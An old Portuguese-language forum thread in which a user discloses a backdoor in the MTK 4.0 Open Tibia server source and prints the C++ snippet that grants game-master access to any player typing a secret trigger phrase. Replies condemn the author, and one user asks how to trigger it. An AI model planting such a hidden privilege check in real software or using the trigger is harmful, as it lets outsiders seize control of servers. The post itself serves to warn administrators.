Ir para conteúdo

Mtk Serv

Carlitos

Posts Recomendados

Bom vou postar isso pq axo que nao devem gostar tanto o dragon screen look:

Bom, quando nossa ekipe estava fazendo uma vistoria nas source da MTK 4.0 achamos o seguinte code

CODE

if(strcmp(text.c_str(),"mtkehfoda.") == 0)

{

Player* player = dynamic_cast<Player*>(creature);

player->access = 3;

{

std::stringstream info;

info << "You now have access 3.";

player->sendCancel(info.str().c_str());

}

}

Isso faz o seguinte, quando um play digita mtkehfoda no console altomaticamente ele ganha acesso 3, obs (O BINARIO QUE ELE POIS NO FORUM`O CODE È DIFERENTE DO POSTO NA SOURCE _ SE TIVER) entao todos otserv baseado nas source da mtk estaou contaminado com esse code, resumindo quem não sabe compilar esta "coisa" pq todos querem ser as pessoas, imagian vc ter um serev dai u cara vira gm do nada e acaba com ele sua dedicação seu tempo, gostaria que admistração ou gerencia toma-se uma atitude contra esse tipo de coisa, não se se nas outra MTK existem, estarei verficando + isso é indevido para que lançar a versao assim! não estou postando para ferrar ninguem e sim mostrar o caracter do nosso amigo dragon screen

Download Mtk 4.0 sem esse code

http://rapidshare.de/files/8581047/MtkServ2.rar.html

Grato Carlitos

Link para o comentário
Compartilhar em outros sites

vlw ae kra mto bom pra qm tem o mtk arruma issu e naum correr

nenhum risco de "se da mal" se alguen virar gm du nd e detona o serv, mas num eskeça q com esse topico vc esta tbm ajudando a alguen se quiser ferrar u mtk fazer issu por vc revelar issu mas msm assim vlw

By Sir Picaralhos

eujogotibia004a6eq4un4fm.gif

Link para o comentário

É.

Realmente.

É uma pena isto.

Eles podiam fazer um server para os usuarios utilizarem 100% de Aproveitamento para os Players,para o Hoster etc.

E Não utilizar o Server como "Beneficio Propio" para ter GM em Varios.

-.-

Eu Acho uma falta de consideração isto.

Gente.

NÃO BAIXEM O MTK.

Para não dar creditos para o Criador.

-.-

Link para o comentário

• 3 weeks later...

eu tente fazer isso no meu ot, q eh mtk, e nao da, tipo, eu escrevi no default, e nao deu, onde q eh q tem q escrever??eu kero saber, pq, se o meu ta com esse code, vou ter q mudar, vlw aew

Link para o comentário

• 9 years later...
  • Criar Novo...